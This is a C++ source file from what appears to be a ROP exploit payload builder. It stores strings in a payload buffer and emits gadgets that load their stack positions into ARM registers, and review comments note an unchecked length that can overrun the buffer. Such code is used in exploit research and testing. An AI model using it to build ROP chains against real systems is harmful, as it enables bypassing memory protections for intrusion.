// ########################
// ropstringhelper.cpp
// ########################
#include "main.h"
//#include "GadgetHelper.h"
#include "ROPStringHelper.h"
// Constructs the string helper on top of GadgetHelper. All four arguments
// (cookieValue, slideValue, fileName, maxSize) are forwarded to the base
// class unchanged; this class adds only the bookkeeping for where strings
// live inside the shared payload buffer.
ROPStringHelper::ROPStringHelper(uint cookieValue,
                                 uint slideValue,
                                 const char* fileName,
                                 uint maxSize)
    : GadgetHelper(cookieValue, slideValue, fileName, maxSize) {
    // Strings are written into the payload after all the gadgets, so the
    // total gadget size has to be estimated before the first placement.
    // A zero offset means "no string stored yet" (mov_r_str_helper tests
    // for exactly this value).
    _last_s_offset = 0;
}
// Stores str1 inside the payload buffer and returns its position relative
// to the PC slot (see the s1_pos computation below). That position can be
// negative, but the return type is uint, so a negative value wraps on return
// and is only meaningful once interpreted again as a signed offset (verify
// against mov_r_sp_x).
// Side effects: advances _last_s_offset and, when zero bytes are not allowed
// in the payload, emits gadgets via str_0_sp_x which, per the author's note,
// clobbers r0, r1 and r4 (tofix).
// NOTE(review): str1 is dereferenced by strlen without a null check, and the
// string length is never compared against the free space in the payload.
// A string longer than the remaining room moves _last_s_offset past the
// start of the buffer (or wraps it, depending on its declared type, which is
// not visible here) and the memcpy/strncpy below then writes outside the
// region returned by getPayload(). A size check before the copy is the fix;
// it is not added here because the function has no error channel.
uint ROPStringHelper::mov_r_str_helper(const char* str1,
BYTE setToBeginning /* = FALSE */) {
uint s1_size = strlen(str1);
int s1_pos; // signed on purpose: the PC-relative position can be negative
if (DEBUG_PAYLOAD)
printf("%s\n", __FUNCTION__);
// Switching back and forth between the two placement modes never worked,
// so the parameter is forced off here; the else branch below is therefore
// unreachable until this todo is resolved.
setToBeginning = FALSE;
if (!setToBeginning) {
if (!_last_s_offset) {
// First string: place it at the very end of the payload, leaving 4 bytes
// after it (room for the terminator written below or by the gadget).
_last_s_offset = getMaxROPSize() - s1_size - 4;
}
else {
// Subsequent strings grow downwards, each taking its length plus the
// 4-byte terminator slot. Nothing stops this from running into the
// gadget area or below offset 0 -- see the NOTE above.
_last_s_offset -= s1_size + 4;
}
}
else {
// Unreachable while setToBeginning is forced to FALSE above; untested.
if (!_last_s_offset) {
// store near the start of the payload
_last_s_offset = 0 + 0x28;
}
else {
_last_s_offset += s1_size + 4;
}
}
// Earlier placement experiments (e.g. storing strings at 65% of the
// payload, or below PC), kept for reference:
// _last_s_offset = getMaxROPSize() -
// (getMaxROPSize() / 10 * 3.5);
// _last_s_offset = getMaxROPSize() -
// (getMaxROPSize() / 10 * 2.6);
// load string below PC
// _last_s_offset = -50;
// printf("[0x%x] [%d] [0x%x]\n", getInitialPC(), _last_s_offset, _payload);
// memcpy((int*)getInitialPC() + _last_s_offset, str1, s1_size);
if (!areZerosAllowed()) {
// No zero bytes may appear in the payload: copy the characters only and
// let a gadget write the terminator later (str_0_sp_x below).
memcpy(getPayload() + _last_s_offset, str1, s1_size);
}
else {
// Zero bytes are fine: copy and terminate directly. This writes
// s1_size + 1 bytes, which fits in the 4 bytes reserved above.
BYTE *str_offset = getPayload() + _last_s_offset;
strncpy((char*)str_offset, str1, s1_size);
*(str_offset + s1_size) = 0;
}
// Position relative to the PC slot. 0x28 is a fixed adjustment whose
// origin is not documented in this file -- presumably a frame/header
// size; verify against GadgetHelper before changing it.
s1_pos = _last_s_offset - getPCLoc() - 0x28;
// NOTE(review): s1_size is uint but printed with %d; harmless for small
// values, but %u would match the type.
if (DEBUG)
printf("mov_r_str: s1_pos: %d, s1_size: %d, "
"last_offset: %d, maxROP: %d (0x%x)\n",
s1_pos, s1_size, _last_s_offset,
getMaxROPSize(), getMaxROPSize());
if (!areZerosAllowed()) {
// Emit the gadget sequence that stores a 0 right after the string.
// Per the author's note this clobbers r0, r1 and r4 (tofix).
str_0_sp_x(s1_pos + s1_size);
}
return s1_pos;
}
// Stores str1 in the payload and emits the gadgets that load its position
// (as computed by mov_r_str_helper) into register `reg`. Per the author's
// notes the helper clobbers r0, r1 and r4 and mov_r_sp_x clobbers r4, so
// callers must not rely on those registers afterwards.
void ROPStringHelper::mov_r_str(uint reg, const char* str1, BYTE setToBeginning /* = FALSE */) {
    // The string must be placed before the register load is emitted, since
    // the load needs the position the placement produces.
    const uint strPos = mov_r_str_helper(str1, setToBeginning);
    mov_r_sp_x(reg, strPos);
}
// Stores two strings and emits gadgets that leave the position of str1 in
// r0 and the position of str2 in r1. Both strings are placed before either
// register is loaded (the helper clobbers r0, r1 and r4 per the author's
// note), and r1 is loaded before r0 because mov_r_sp_x is noted to clobber
// r0 and r4 -- loading r0 last keeps its value intact.
void ROPStringHelper::r0_str1__r1_str2(const char* str1,
                                       const char* str2,
                                       BYTE setToBeginning /* = FALSE */) {
    if (DEBUG_PAYLOAD) {
        printf("%s\n", __FUNCTION__);
    }
    // placement first: str1, then str2 (order determines the offsets)
    const uint firstPos = mov_r_str_helper(str1, setToBeginning);
    const uint secondPos = mov_r_str_helper(str2, setToBeginning);
    // register loads last, r1 before r0
    mov_r_sp_x(1, secondPos);
    mov_r_sp_x(0, firstPos);
}